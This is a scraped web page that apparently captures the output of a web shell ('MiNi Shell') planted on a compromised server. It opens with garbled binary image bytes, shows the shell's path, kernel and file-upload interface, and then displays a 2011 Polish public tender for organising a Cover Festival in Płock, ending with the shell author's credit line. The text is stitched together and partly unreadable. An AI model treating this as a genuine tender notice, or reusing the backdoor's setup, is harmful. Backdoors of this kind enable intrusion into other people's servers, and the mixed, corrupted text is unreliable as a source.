JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/106733-N-2011.html

<p class="kh_header"><b>Płock: Organizacja imprezy plenerowej pn. Pożegnanie lata - Cover Festiwal 2011</b><br>
<b>Numer ogłoszenia: 106733 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Płocki Ośrodek Kultury i Sztuki , ul. Tumska 9, 09-402 Płock, woj. mazowieckie, tel. 0-24 367 19 20, faks 0-24 367 19 20 wew. 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pokis.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: INSTYTUCJA KULTURY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja imprezy plenerowej pn. Pożegnanie lata - Cover Festiwal 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja imprezy plenerowej w Płocku pn. Pożegnanie lata - Cover Festiwal 2011 w dniu 03 września 2011 roku.


W zakres organizacji wchodzi:

I)	Organizacja imprezy masowej pod nazwą Pożegnanie Lata - Cover Festiwal 2011 w dniu 03 września 2011 roku na terenie plaży nad Wisłą w Płocku pod względem formalno - prawnym zgodnie z Ustawą z dnia 20 marca 2009 roku o bezpieczeństwie imprez masowych (Dz.U. z 21 kwietnia 2009 roku, Nr 62, poz. 504).
- terminowe pozyskanie niezbędnych opinii służb miejskich miasta Płocka;
- zezwolenia Prezydenta Miasta Płocka na przeprowadzenie imprezy masowej;
- ubezpieczenie imprezy masowej.

II)	Organizacja imprezy głównej biletowanej na terenie plaży nad Wisłą w Płocku w dniu  03 września 2011 roku.

III)	Zabezpieczenie imprezy pod nazwą Pożegnanie Lata - Cover Festiwal 2011 w dniu 03 września 2011 roku na terenie plaży nad Wisłą w Płocku zgodnie z Ustawą z dnia 20 marca 2009 roku o bezpieczeństwie imprez masowych (Dz.U. z 21 kwietnia 2009 roku, Nr 62, poz. 504).
- zabezpieczenie imprezy pod względem bezpieczeństwa osób i mienia (Wynajem     koncesjonowanej agencji ochrony osób i mienia. Wykonawca podpisuje umowę z agencją ochrony wyłonioną  przez Zamawiającego do ochrony imprez organizowanych w 2011 r. ),
- zabezpieczenie medyczne zgodne z zaleceniami Wojewódzkiej Stacji    Pogotowia Ratunkowego i Transportu Sanitarnego w Płocku;
- zabezpieczenie imprezy pod względem higieniczno - sanitarnym zgodnym z 
zaleceniami Państwowego Inspektora Sanitarnego w Płocku (toalety typu TOI-TOI na terenie imprezy, zapleczu scenicznym oraz polu namiotowym w ilości dostosowanej do liczby publiczności);
- zabezpieczenie przeciw pożarowe zgodne z zaleceniami Państwowej Straży 
  Pożarnej w Płocku

IV)	Zapewnienie oraz organizacja programu artystycznego (koncertów szeroko pojętej muzyki rockowej oraz jej odmian) na scenie usytuowanej na Plaży nad Wisłą w Płocku w dniu 03 września 2011 roku w godzinach 16:00 - 0:00 (minimum 2 zespoły zagraniczne oraz minimum 5 zespołów polskich o odpowiednio wysokim poziomie artystycznym). Oceny złożonych programów artystycznych dokona komisja przetargowa w toku postępowania.

V)	Zapewnienie techniki scenicznej:

1.	Profesjonalny, stabilny i odpowiednio zabezpieczony podest sceniczny o wymiarach minimum 12 m x 10 m i wysokości 2 m z podestów estradowych lub w systemie layher o powierzchni anty poślizgowej z barierkami zabezpieczającymi (z trzech stron) o wysokości minimalnej 1,2 m, zbudowany i zabezpieczony zgodnie z Polskimi Normami. 
2.	Aluminiowe, stabilne i odpowiednio zabezpieczone zadaszenie łukowe, pokryte ognioodpornym poszyciem, na wysokości minimum 7 m od poziomu sceny do frontowej, poziomej belki zadaszenia, podparte na czterech aluminiowych słupach w systemie layher, dopasowane do budowy sceny oraz nie zajmujące powierzchni sceny, zbudowany i zabezpieczony zgodnie z Polskimi Normami.
3.	Osłona sceny z trzech stron (horyzont oraz 2 boki) wykonana z ognioodpornego materiału w kolorze czarnym, posiadająca atesty p.poż.
4.	Stabilne schody o szerokości minimum 2 m z barierkami zabezpieczającymi po obu stronach schodów o wysokości minimalnej 1,2 m i stopniami anty poślizgowymi zbudowany i zabezpieczony zgodnie z Polskimi Normami.
5.	Osłona podestu scenicznego (front i 2 boki) i podestów pod perkusję materiałem                     w kolorze czarnym;
6.	Profesjonalny, stabilny, zadaszony, osłonięty z trzech stron i odpowiednio zabezpieczony podest dla realizatora systemu monitorowego o wymiarach minimum     6 m x 2 m i wysokości 2 m z podestów estradowych lub w systemie layher  o powierzchni anty poślizgowej z barierkami zabezpieczającymi (z trzech stron) o wysokości minimalnej 1,2 m, ustawiony obok głównej sceny i nie zajmujący powierzchni sceny  zbudowany i zabezpieczony zgodnie z Polskimi Normami.
7.	Stabilne i odpowiednio zabezpieczone dwie wieże (zadaszone i osłonięte od frontu odpowiednią siatką, która nie tłumi dźwięku) do podwieszenia systemu nagłośnieniowego o wymiarach minimum 2,5 m x 2,5 m i wysokości 11 m po obu stronach sceny wraz z podestami pod kolumny subbasowe o wymiarach minimum 2,5 m x 2,5 m i wysokości 0,2 m, zbudowany i zabezpieczony zgodnie z Polskimi Normami. Jeśli słupy od głównego zadaszenia będą w systemie layher zostaną one na pewno wykorzystane jako wieże pod nagłośnienie, więc punkt 9 zostanie pominięty (dodatkowo belka do podwieszenia systemu nagłośnieniowego o minimalnej nośności 1.5 T - wymagany atest)
8.	Stabilny i odpowiednio zabezpieczone trzypoziomowe stanowisko dla realizatora nagłośnienia ( I poziom na wysokości minimum 0,3 m), oświetlenia ( II poziom                         na wysokości minimum 2,5 m) i wizji multimedialnej (III poziom na wysokości minimum                4,5 m),stanowisko wyposażone w pion komunikacyjny w postaci klatki schodowej,  zadaszone i osłonięte z trzech stron materiałem ognioodpornym oraz barierkami zabezpieczającymi z trzech stron   na każdym poziomie. Stanowisko o wymiarach minimum 6 m x 3 m i wysokości 6,5 m. oraz ustawione w odległości 30 m od sceny oraz w osi sceny, zbudowany i zabezpieczony zgodnie z Polskimi Normami.
Uwaga: wszystkie ww. urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

VI)	Zapewnia wynajęcie niezbędnego backline-u na potrzeby koncertów gwiazd zagranicznych oraz polskich. Backline musi być zgodny z wymogami technicznymi zespołów.

VII)	Zapewnienie nagłośnienia scenicznego P.A. oraz systemu monitorowego (Main Stage):

1.	System P.A. renomowanych firm, preferowane L-ACOUSTICS V-DOSC, K1 lub MEYER SOUND MILO - Line Array Active System. Moc systemów P.A. adekwatny                             do powierzchni terenu imprezy.
2.	System monitorowy zgodny z riderami technicznymi artystów preferowany d&b MAX, MEYER SOUND, TURBOSOUND.
Uwaga: wszystkie ww. urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

VIII)	Zapewnienie oświetlenia scenicznego:

1.	Oświetlenie sceniczne winno być zgodne z riderami technicznymi występujących zespołów;
2.	Oświetlenie sceniczne nie winno być mniejsze niż:

L.p.	Rodzaj urządzenia	Ilość	Uwagi
1.	Urządzenia inteligentne typu Mac 700	20 szt.	Urządzenia nie gorszej jakości jak firmy Martin.
2.	Lampy profilowe typu PC 1000 W	10 szt.	Urządzenia nie gorszej jakości jak firmy Griven.
3.	Oświetlenie efektowe publiczności (każda z 4 żarówkami)	8 szt.	Urządzenia nie gorszej jakości jak firmy DTS.
4. 	Oświetlenie terenu imprezy, terenu pola namiotowego o minimalne mocy 1000 w	
1000 W PAR - 30 szt.	
5.	Urządzenia inteligentne typu Mac 500	20 szt.	Urządzenia nie gorszej jakości jak firmy Martin.
6.	Światło administracyjne zaplecza scenicznego o minimalnej mocy 500 W każda	8 punktów świetlnych	.
	

3. 	Pozostały sprzęt, niezbędny do realizacji i obsługi technicznej w/w oświetlenia należy do wyboru oferenta, ale spełniający odpowiednie wymogi i spełniający Polskie Normy, czyli: pełne okablowanie (piony, DMX, kable sieciowe itd.), sterownik oświetlenia, końcówki mocy (dimmery) i ewentualne dodatkowe trawersy do podwieszenia oświetlenia.
Uwaga: wszystkie ww. urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

IX)	Agregaty prądotwórcze (scena główna, namiot VIP, Art Lunch oraz catering):
1.	Ilość oraz moc agregatów prądotwórczych odpowiednia oraz umożliwiająca stałe zasilenie całej techniki imprezy.

Uwaga: wszystkie ww. urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.


X)	Zapewnienie wyposażenia zaplecza scenicznego:

1.	Garderoby: minimum 4 stabilnych, profesjonalnych namiotów przeznaczonych na garderoby dla artystów o wymiarach minimum 5m x 5m i wysokości 2, 3 m, z równą, anty poślizgową podłogą i wyposażeniem w każdej garderobie w postaci:
-	10 stabilnych krzeseł z oparciem;
-	1 sofa do wypoczynku
-	1 stabilny stół o wymiarach minimum 0,9m x 0,9m i wysokości 0,9m;
-	1 punkt świetlny dobrze oświetlający całą garderobę; 
-	1 lustro o wymiarach minimum 0,3m x 1m;  
-	1 wieszak stojący;
-	1 chłodziarka do napojów
Garderoby winny być wyposażone zgodnie z wymaganiami występujących zespołów.
2.	Namiot ArtLunch o minimalnej powierzchni 100 mkw z podłogą i minimalnym wyposażeniem w postaci:
      -     stoły i krzesła zgodnie z ilością występujących artystów; 
      -     stół szwedzki dla cateringu;
      -     wewnętrzne oświetlenie namiotu;
	-    sofy do wypoczynku
3.	Namiot VIP o minimalnej powierzchni 300 mkw z podłogą i minimalnym wyposażeniem w postaci:
      -     stoły i krzesła dla 100 osób;
      -     stół szwedzki dla cateringu;
      -     wewnętrzne oświetlenie namiotu;
      -     sofy do wypoczynku
4.	Utwardzenie dojść od głównej drogi do sceny, namiotów ArtLunch i VIP oraz garderób i TOI - TOI w postaci płyt typu plastry miodu lub podestów scenicznych.                    Dojścia o minimalnej szerokości 1,5 [m].
5.	Minimum 2 toalety dla gości VIP oraz 2 oddzielne dla artystów.
Uwaga: wszystkie ww. urządzenia (4 garderoby) winny posiadać wszelkie atesty.

XI)	Zapewnienie multimediów
1.	2 ekrany do tylnej projekcji, umieszczone po bokach sceny o wymiarach min. 4 x 3 m każdy.
2.	2 projektory o sile min. 1000 Ansi Lumenów;
3.	Przystosowane konstrukcje aluminiowe do montażu ekranów i projektorów;
4.	Pozostały niezbędny sprzęt do realizacji multimedialnej (okablowanie, miksery itp.)
5.	Obsługa kamerowa w postaci minimum 3 kamer:
6.	Realizacja wizualizacji.
7.	Obsługa i realizacja wizji z kamer oraz z wizualizacji na ekrany.

Uwaga: wszystkie ww. urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

XII)	Zapewnienie noclegów dla artystów, ekip technicznych oraz w razie potrzeby transport lądowy oraz lotniczy;
XIII)	Zapewnienie cateringu dla występujących zespołów w garderobach i namiocie ArtLunch, zgodnie z wymaganiami riderowymi.
XIV)	Zapewnienie cateringu w namiocie VIP w postaci stołu szwedzkiego (prosimy o przedstawienie propozycji menu)
XV)	Zapewnienie cateringu dla publiczności
XVI)	Zapewnienie stoisk do sprzedaży pamiątek i rzeczy związanych z muzyką rockową oraz imprezą;
XVII)	Adaptacja terenu rezerwowego z możliwością rozbicia namiotów dla minimum 1000 osób:
1.	Zapewnienie odpowiednich warunków sanitarno - higienicznych (toalety, umywalki);
2.	Namiot z obsługą do rejestracji osób śpiących na polu namiotowym.
XVIII)	Promocja Festiwalu:
1.	Wykonanie projekt plakatu, zaproszenia, biletu, billboardu, ulotek. Projekt w pełnym kolorze;
2.	Wydruki poligraficzne:
- plakat w formacie minimum B2 oraz gramatury 200 kreda w ilości 1000 szt.;
- ulotki reklamowe w formacie minimum B6 oraz gramatury 170g w ilości 20.000 szt.
- zaproszenia w formacie DL w minimalnej ilości 200 szt. 
- billboardy (na nośniki reklamowe min. w Płocku, Warszawie, Wrocławiu, Krakowie, Poznaniu, Olsztynie, Toruniu itp.);
3.	Ekspozycja plakatów w miastach: Warszawa, Łódź, Toruń, Kraków, Wrocław, Trój Miasto, Poznań, Olsztyn, Lublin itp. (minimum 10 największych miast w Polsce);
4.	Kolportaż ulotek na terenie całej Polski w 10 największych miast Polski;
5.	Pozyskanie patronów medialnych (typu: TV, Radio, Prasa, Internet);
6.	Nagranie radiowych spotów reklamowych oraz ich emisja w stacjach regionalnych Płocka lub ogólnopolskich;
7.	Zapewnienie umieszczenia banerów reklamowych na stronach internetowych o tematyce muzycznej;
XIX)	W ofercie proszę o przedstawienie specyfikacji zapewnianej techniki scenicznej (sceny, namioty, nagłośnienia PA i monitorowe, multimediów)
XX)	Oferta powinna zawierać ceny biletów wstępu na teren biletowany (plaża nad Wisłą).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.31.20.00-1, 92.31.21.20-8, 92.31.21.30-1, 92.31.22.50-8, 92.37.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada doświadczenie zawodowe niezbędne do wykonania zamówienia tj. zrealizował lub jest w trakcie realizacji, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę   polegającą na organizacji imprezy plenerowej - masowej której wartość w skali roku była  nie mniejsza niż 200 tys. zł. brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - scenariusz - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pokis.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Płocki Ośrodek Kultury i Sztuki, ul. Tumska 9a, 09-402 Płock.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 09:30, miejsce: Płocki Ośrodek Kultury i Sztuki, ul. Tumska 9a, 09-402 Płock - Sala Widowiskowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com